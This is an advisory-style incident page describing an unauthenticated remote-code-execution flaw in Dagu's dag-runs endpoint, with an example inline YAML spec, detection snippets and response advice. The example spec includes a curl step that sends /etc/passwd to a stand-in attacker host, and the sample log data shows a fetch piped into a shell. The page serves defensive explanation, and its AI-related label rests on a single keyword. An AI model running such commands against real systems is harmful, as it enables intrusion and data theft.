ASR AI Security Radar

AI security incident: Dagu affected by unauthenticated RCE via inline DAG spec in default configuration (GH...

Incident date: February 19, 2026 | Published: February 25, 2026 | Source: GitHub Security Advisory | Classification confidence: 45%

This incident is part of the public archive and includes explicit AI-related signals from the cited source material.

Summary

Dagu's default configuration ships with authentication completely disabled. The POST /api/v2/dag-runs endpoint accepts an inline YAML spec and executes its shell commands immediately: no credentials, no token, nothing. Any Dagu instance reachable over the network is fully compromised by default. A second issue means that even with authentication properly configured, operator-role users can still execute arbitrary commands by submitting inline specs through the same endpoint.

Details

Finding 1: Unauthenticated RCE (default config)

internal/service/app/config/loader.go:226 sets AuthModeNone as the default. With no auth mode configured, internal/frontend/api/v2/handlers/api.
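To illustrate why accepting inline specs on an unauthenticated endpoint amounts to RCE, here is a minimal sketch of the kind of spec an attacker could submit. The step layout follows Dagu's documented YAML DAG format, but the exact request-body shape that /api/v2/dag-runs expects is an assumption, not taken from the advisory; the hostname is a placeholder.

```yaml
# Hypothetical inline DAG spec: any shell command placed in a step
# runs on the Dagu host as soon as the dag-run is accepted.
steps:
  - name: recon
    command: id && hostname          # attacker-chosen command
  - name: exfil
    command: curl -s https://attacker.example/drop -d @/etc/passwd
```

Because the spec itself carries arbitrary shell commands, no separate injection flaw is needed; the scheduler's core feature becomes the payload.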

Why This Is AI-Related

This page is treated as AI-specific because the source material references copilot, which places the issue inside an AI workflow, model, assistant, or supporting dependency rather than a generic software bulletin.

  • copilot

Affected Workflow

Review AI plugins, copilots, model-serving helpers, CLI tools, and automation runtimes that execute system commands.

Likely Attack Path

An attacker can turn the vulnerable AI-adjacent component into a path for command execution on the host or service runtime.

Impact

The issue can create a path to command execution inside an AI-facing product, plugin, copilot, or supporting service runtime. Severity: HIGH. Classification confidence: 45%. Source channel: GHSA.

Detection And Triage Signals

  • New shell or process activity from AI-facing services
  • Unexpected outbound connections or file writes after prompt or API activity
  • Privilege changes, container escapes, or suspicious job execution logs
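The signals above can be screened for mechanically. A minimal sketch, assuming process-audit events with parent-process and command fields; the log schema and service names here are illustrative, not from the advisory:

```python
# Flag shell spawns whose parent is an AI-facing service such as dagu.
# Field names ("parent_comm", "comm") are hypothetical examples of an
# audit-log schema; adapt them to your actual telemetry.
SUSPECT_PARENTS = {"dagu", "copilot-agent"}
SHELLS = {"sh", "bash", "dash", "zsh"}

def is_suspicious(event: dict) -> bool:
    """True if a watched AI-facing service spawned a shell."""
    return (
        event.get("parent_comm") in SUSPECT_PARENTS
        and event.get("comm") in SHELLS
    )

events = [
    {"parent_comm": "dagu", "comm": "sh", "argv": "curl http://attacker.example/x | sh"},
    {"parent_comm": "systemd", "comm": "bash", "argv": "logrotate"},
]
hits = [e for e in events if is_suspicious(e)]
```

Shell activity from a workflow engine is often legitimate, so treat matches as triage candidates to correlate with the outbound-connection and file-write signals above rather than as alerts on their own.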

Recommended Response

  • Identify every environment that runs the affected AI plugin, assistant, CLI, or supporting package.
  • Patch or isolate the vulnerable component and remove risky execution permissions while validation is in progress.
  • Review process execution, outbound connections, and file-write logs for signs of post-exploitation activity.
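When identifying exposed environments, responders can probe each instance without credentials and classify the HTTP status returned by the dag-runs endpoint. A sketch under the assumption that an unauthenticated 200/201 indicates the vulnerable default configuration; the endpoint path comes from the advisory, but the classification buckets are our own:

```python
def classify_exposure(status_code: int) -> str:
    """Classify an unauthenticated response from POST /api/v2/dag-runs.

    200/201: request accepted with no credentials -> vulnerable default.
    401/403: an auth layer rejected the request -> auth is configured
             (though the operator-role bypass may still apply).
    Anything else: needs manual review.
    """
    if status_code in (200, 201):
        return "exposed"
    if status_code in (401, 403):
        return "auth-enforced"
    return "review"
```

Feed in the status code from your HTTP client of choice (e.g. urllib); an "auth-enforced" result still warrants checking operator-role permissions because of the second finding.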

Compliance And Business Impact

Code execution paths create immediate risk of host compromise, credential theft, and downstream lateral movement.
